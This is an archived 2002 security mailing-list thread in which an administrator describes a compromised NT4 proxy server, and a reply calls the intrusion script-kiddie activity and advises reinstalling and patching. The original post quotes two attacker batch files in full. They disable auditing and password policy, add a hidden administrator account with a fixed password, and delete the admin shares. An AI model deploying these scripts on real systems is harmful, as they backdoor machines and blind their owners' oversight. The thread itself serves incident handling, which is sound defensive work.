RE: Proxy server hit... Any ideas?
From: ZeroBreak (ZeroBreak@softhome.net)
Date: 11/21/02
- Previous message: Jeroen Wesbeek: "Strange apache logs: CONNECT maila.microsoft.com:25"
- In reply to: Mike Cain: "Proxy server hit... Any ideas?"
- Next in thread: Russell Harding: "Re: Proxy server hit... Any ideas?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "ZeroBreak" <ZeroBreak@softhome.net> To: incidents@securityfocus.com Date: Wed, 20 Nov 2002 20:52:25 -0500
I have seen a lot of this. A bunch of script kiddie's scanning for the
most obvious holes. From some of the one's I've seen, it looked like
some of them were using an automated script to do pretty much all of the
work, other's did it manually. Most of servers were running serv-u ftp,
an irc bot, and were pretty much being zombies.
Obviously I would consider reinstalling and patching the system. It
doesn't take long at all to reinstall NT and setup proxy. But if this is
something you can't take down for a day or so, then I wouldn't consider
it that big of a deal. Delete the stuff they installed and patch the
system so they can't do it again. It wasn't solely an attack on your
network, so you have a better chance of them not pilfering through all
your data. More so just using it as another server to add to their list.
Just look at what irc server & channel the bot connected too, you'll see
all the others :).
Have fun.
-- ZeroBreak
-----Original Message-----
From: Mike Cain [mailto:mikec@lpinsurance.com]
Sent: Monday, November 18, 2002 9:01 AM
To: incidents@securityfocus.com
Subject: Proxy server hit... Any ideas?
Well, I have had my first run-in with a hacker, or was it a virus? I'm
not 100% sure.. Guess I should start from the beginning...
A days ago, I began to get user complaints on the slowness of the
internet. I figured it was mostly them just wanting something to
complain about, so I did what all crappy admins do, I ignored it. Well,
last night the box was rebooted after some software was updated. Today
people were complaining about how PAINFULLY slow the internet was, so I
looked at the proxy server. NT4 running proxy3. I know, there is newer
better stuff, but its what I have to work with. :) SO... I looked at the
processes and noticed the CPU hovering at 35-50%.. Way too high. So a
quick look at the process list showed two things that I didn't remember
needing to be there, win.exe and start.exe. Next move was to find them,
and they were in the winnt\system\ folder. What I also found odd was
that there were three new folders in that directory all created on the
8th, NT, tools, and win.
Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
(says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
Routine), and _zoLibr.dll
3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
win.exe, x32.dll.bkup
SO, anyone know what I have or what hit me? From looking at the sercure
and secure1 batch files, it looks like a root kit... But I'mm new at
this side of security I'mm aCiscoo guy...)
Last thing, the logs show that the attacker was hitting the
\scripts\sample\ folder... Meaning I think he was trying to use the old
IIS Sample Scripts to execute local code... Not sure if he was
successful...
Thanks in advance!!
Mike Cain
CCNP/MCSE
Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)
>> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\signsecure
channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\sealsecure
channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requirestr
ongkey=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requiresig
norseal=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\disablepas
swordchange=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\r
equiresecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nablesecuritysignature=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e
nableplaintextpassword=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\requir
esecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
securitysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable
forcedlogoff=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\autodi
sconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session
manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory
management\clearpagefileatshutdown=4,0 >> temp echo
machine\system\currentcontrolset\control\print\providers\lanman
print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
>> temp
echo
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >>
temp echo
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
>> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
>> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
>> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\shutdo
wnwithoutlogon=4,1 >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticetext=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln
oticecaption=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\dontdi
splaylastusername=4,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp echo
machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp echo
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp echo
[Privilege Rights] >> temp echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp echo sebackupprivilege =
*S-1-5-32-544,*S-1-5-32-551 >> temp echo sebatchlogonright = >> temp
echo sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp echo
secreatepermanentprivilege = >> temp echo secreatetokenprivilege = >>
temp echo sedebugprivilege = *S-1-5-32-544 >> temp echo
sedenybatchlogonright = >> temp echo sedenyinteractivelogonright = >>
temp echo sedenynetworklogonright = >> temp echo sedenyservicelogonright
= >> temp echo seenabledelegationprivilege = >> temp echo
seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp echo
seincreasequotaprivilege = *S-1-5-32-544 >> temp echo
seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040
8961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >>
temp echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp echo
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo
sesecurityprivilege = *S-1-5-32-544 >> temp echo seservicelogonright =
>> temp echo seshutdownprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp echo
sesyncagentprivilege = >> temp echo sesystemenvironmentprivilege =
*S-1-5-32-544 >> temp echo sesystemprofileprivilege = *S-1-5-32-544 >>
temp echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp echo
setcbprivilege = >> temp echo seundockprivilege =
*S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp echo Adding User %1
with the Password %2 ... net user /add slash 971985 echo Adding slash to
the Local Administrator Group ... net localgroup administrators slash
/add echo Loading New Security Policy ... secedit.exe /configure /areas
USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp echo System is now
secure.
Secure1.bat
net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Next message: Micheal Patterson: "Re: Compromised FBSD/Apache"
- Previous message: Jeroen Wesbeek: "Strange apache logs: CONNECT maila.microsoft.com:25"
- In reply to: Mike Cain: "Proxy server hit... Any ideas?"
- Next in thread: Russell Harding: "Re: Proxy server hit... Any ideas?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
